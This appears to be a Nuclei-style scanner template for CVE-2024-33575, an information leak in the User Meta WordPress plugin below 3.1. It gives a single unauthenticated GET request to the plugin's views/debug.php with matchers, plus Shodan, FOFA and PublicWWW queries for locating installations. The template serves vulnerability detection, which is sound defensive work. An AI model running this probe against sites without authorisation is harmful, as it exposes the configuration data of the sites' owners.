id: CVE-2024-33575 info: name: User Meta WP Plugin < 3.1 - Sensitive Information Exposure author: Kazgangap severity: medium description: | The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data. remediation: Fixed in 3.1 reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-33575 - https://wpscan.com/vulnerability/3b75549c-3fc5-4e6f-84ae-264d8276bfb3/ - https://patchstack.com/database/vulnerability/user-meta/wordpress-user-meta-plugin-3-0-sensitive-data-exposure-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-33575 cwe-id: CWE-200 epss-score: 0.00053 epss-percentile: 0.21091 metadata: vendor: User Meta product: User Meta framework: wordpress publicwww-query: "/wp-content/plugins/user-meta/" shodan-query: http.html:/wp-content/plugins/user-meta/ fofa-query: body=/wp-content/plugins/user-meta/ tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/user-meta/views/debug.php" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "um-debug
")' condition: and # digest: 4a0a0047304502200273cf6345bda7ae0f53bba3ecd04ff070ee62c82b146898fc2a612f9363f6d602210087a74005c7a282fc34b4d12bdbe7fe68c141019e1ab85581d000d319aeff2fd5:922c64590222798bb761d5b6d8e72950